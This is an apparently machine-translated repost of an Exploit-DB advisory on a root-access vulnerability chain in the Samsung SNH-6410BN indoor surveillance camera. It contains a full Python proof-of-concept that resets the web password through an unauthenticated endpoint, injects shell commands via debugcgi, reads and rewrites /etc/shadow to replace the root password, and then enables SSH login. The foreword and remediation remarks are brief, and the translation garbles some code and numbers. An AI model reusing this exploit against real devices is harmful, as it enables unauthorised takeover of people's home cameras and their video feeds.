Samsung smart surveillance camera is explosion proof remote code execution vulnerability with POC-the exploit-warning-the black bar safety net

ID MYHACK58:62201678085
Type myhack58
Reporter 佚名
Modified 2016-08-16T00:00:00


Vulnerability overview EDB-ID:4 0 2 3 5 Vulnerability found by: PentestPartners CVE: no Release Date: 2 0 1 6 years 0 8 month 1 4 day Vulnerability type: remote vulnerability Affected platforms: the system hardware Affected App: no Exploit POC: click to download Foreword Currently, the vast majority of security research experts in the IOT devices for vulnerability research, the study focused on how to exploit these vulnerabilities to expand the network to attack. Very few people know how to fix these security issues, but also almost nobody cares about how to prevent these devices continue to suffer from attacks. To this end, we are dedicated to an IP Surveillance Camera are analyzed, and found many small issues. And these security issues together, we will be able to get to the target device's root access. Although their are some small problems, but fix up is very difficult. So we think we should specifically write an article on how to find and fix IOT device vulnerabilities of the article. Our research object is the Samsung an indoor IP Surveillance Camera-SNH-6410BN it. If purely from a quality and functional perspective to the study, then this camera without any problem, because it captured the sharpness is very high, and Samsung also with very good applications. However, it is an IP camera, so the network security issues become the IT piece of the short version. Typically, the user will use the mobile application or website provided by the“cloud”to remotely access the camera. However, this camera is still the SSH, but also specifically with the correspondingthe Web server. This is how we test the entry point. Becausethe Web serveronly supports the HTTP Protocol, and does not support using the HTTPS Protocol. Exploit code

E-DB Note: source ~

import urllib, urllib2, crypt, time

New password for the web interface

web_password = 'admin'

New password for root

root_password = 'root'

IP of the camera

ip = ''

These are all for the Smartthings bundled camera

realm = 'iPolis' web_username = 'admin' base_url = 'http://' + ip + '/cgi-bin/adv/debugcgi? msubmenu=shell&command=ls&command_arg=/...;'

Take a command and use command injection to run it on the device

def run_command(command):

Convert a normal command into one using bash brace expansion

Can't send spaces to debugcgi as it doesn't unescape

command_brace = '{' + ','. join(command. split(' ')) + '}' command_url = base_url + command_brace

HTTP digest auth for urllib2

authhandler = urllib2. HTTPDigestAuthHandler() authhandler. add_password(realm, command_url, web_username, web_password) opener = urllib2. build_opener(authhandler) urllib2. install_opener(opener)

return urllib2. urlopen(command_url)

Step 1 - change the web password using the unauthed vuln found by zenofex

data = urllib. urlencode({ 'data' : 'NEW;' + web_password }) urllib2. urlopen('http://' + ip + '/classes/class_admin_privatekey.php', data)

Need to sleep or the password isn't changed

time. sleep(1)

Step 2 - find the current root password hash

shadow = run_command('cat /etc/shadow')

for line in shadow: if line. startswith('root:'): current_hash = line. split(':')[1]

Crypt the new password

new_hash = crypt. crypt(root_password, '0 0')

Step 3 - Use sed to search and replace the old for the new hash in the passwd

This is done because the command injection doesn't allow a lot of different URL encoded chars

run_command('sed-i-e s/' + current_hash + '/' + new_hash + '/g /etc/shadow')

Step 4 - check that the password has changed

shadow = run_command('cat /etc/shadow')

for line in shadow: if line. startswith('root:'): current_hash = line. split(':')[1]

if current_hash new_hash: print 'Error! - password not changed'

Step 5 - ssh to port 1 0 2 2 with the new root password!

One problem A description of the problem: the user on the access device, the network communication data and is not transmitting the encryption process, so the user's credentials and data during transmission, security cannot give any guarantees, an attacker can arbitrarily intercept and tamper with user data. Solution: in the information transfer process, as much as possible using a secure Protocol, and each device is assigned a random key. The Web interface only uses a“private key”to provide basic security. This“private key”is just a password, the lack of the corresponding user name.

[1] [2] next